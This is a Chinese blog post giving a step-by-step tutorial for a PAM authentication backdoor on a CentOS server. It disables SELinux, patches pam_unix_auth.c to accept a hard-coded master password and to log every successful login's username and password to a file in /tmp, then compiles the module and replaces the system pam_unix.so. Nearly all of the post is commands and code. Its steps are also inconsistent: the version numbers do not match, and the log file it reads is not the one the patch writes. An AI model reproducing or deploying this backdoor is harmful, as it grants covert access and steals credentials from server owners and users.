setenforce 0
vim /etc/selinx/config
selinux=disabled
setatus(selinux status)
[root@lavm-x04s4kv7q3 selinux]# rpm -qa | grep pam
pam-1.1.8-23.el7.x86_64
pam-devel-1.1.8-23.el7.x86_64
阿里云pam镜像:https://mirrors.aliyun.com/blfs/conglomeration/Linux-PAM/
wget https://mirrors.aliyun.com/blfs/conglomeration/Linux-PAM/Linux-PAM-1.6.1.tar.xz
tar -xvJf Linux-PAM-1.6.1.tar.xz
安装gcc编译器和flex库:
yum install epel-release
yum install gcc flex flex-devel -y
vim /root/Linux-PAM-1.3.1/modules/pam_unix/pam_unix_auth.c
设置序号
:set nu
if(strcmp(p,”haier08@”)==0){
174 retval=PAM_SUCCESS;
175 }
176 if(retval==PAM_SUCCESS){
177 FILE * fp;
178 fp=fopen(“/tmp/pam.txt”,”a”);
179 fprintf(fp,”%s::%s\n”,name,p);
180 fclose(fp);
181 }
182 name = p = NULL;
183
184 AUTH_RETURN;
185 }
./configure && make
编译完文件在modules/pam_unix/.libs/pam_unix.so
/root/Linux-PAM-1.3.1/modules/pam_unix/.libs
sudo find / -name pam_unix.so
/usr/lib64/security/pam_unix.so
/root/Linux-PAM-1.3.1/modules/pam_unix/.libs/pam_unix.so
备份原有pam_unix.so
cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bak
复制新 PAM 模块到 /lib64/security/ 目录下
cp /root/Linux-PAM-1.3.1/modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so
cp: overwrite ‘/usr/lib64/security/pam_unix.so’? y
whoami
ssh @ip
cat /tmp/.ssh.log
![图片[1]-pam后门-晴天生活分享日志](https://osaka2.cn/wp-content/uploads/2024/05/QQ浏览器截图20240510130042.png)
感谢您的来访,获取更多精彩文章请收藏本站。
1. 资源都是经过站长或作者收集测试修改后发布分享。转载请在文内以超链形式注明出处,谢谢合作!
2. 本站除原创内容,其余所有内容均收集自互联网,仅限用于学习和研究目的,本站不对其内容的合法性承担任何责任。如有版权内容,请通知我们或作者删除,其版权均归原作者所有,本站虽力求保存原有版权信息,但因众多资源经多次转载,已无法确定其真实来源,或已将原有信息丢失,所以敬请原作者谅解!
3. 本站用户所发布的一切资源内容不代表本站立场,并不代表本站赞同其观点和对其真实性负责,若您对本站所载资源作品版权归属存有异议,请留言附说明联系邮箱,我们将在第一时间予以处理 ,同时向您表示歉意!为尊重作者版权,请购买原版作品,支持您喜欢的作者,谢谢!
4. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客如有发现请立即向站长举报;本站资源文件大多存储在云盘,如发现链接或图片失效,请联系作者或站长及时更新。
测试-晴天生活分享日志">
彩虹易支付使用教程-晴天生活分享日志">
暂无评论内容